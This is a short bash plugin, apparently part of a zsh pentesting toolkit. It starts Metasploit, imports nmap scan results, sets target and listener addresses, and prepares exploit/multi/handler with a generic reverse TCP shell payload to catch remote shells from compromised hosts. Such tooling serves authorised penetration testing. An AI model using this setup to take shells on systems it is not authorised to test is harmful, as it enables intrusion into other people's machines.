#!/bin/bash
source $PENZSH_CMD_DIR/.core

function penzsh_cmd_do()
{
	pzcore_func_require "which msfconsole" "return 1 #Automated install of msfconsole not yet supported"
	if [ "$?" = 0 ] ; then
		msfdb init
		read "REPLY?Metasploit Workspace: "
		msfconsole -q -x "workspace -a $REPLY;db_import $pzcore_dir_enum/nmap/*.xml;setg RHOST $pzcore_target;setg RHOSTS $pzcore_target;use exploit/multi/handler;setg LHOST $pzcore_lhost;set ExitOnSession False;set payload generic/shell_reverse_tcp;show options"
	fi
}

function penzsh_cmd_info()
{
	echo -e "Initiates msfdb before running msfconsole. Automatically sets globals RHOST(S) to $pzcore_target and LHOST to $pzcore_lhost. Imports xml files in $pzcore_dir_enum/nmap, and prepares exploit/multi/handler for use."
}
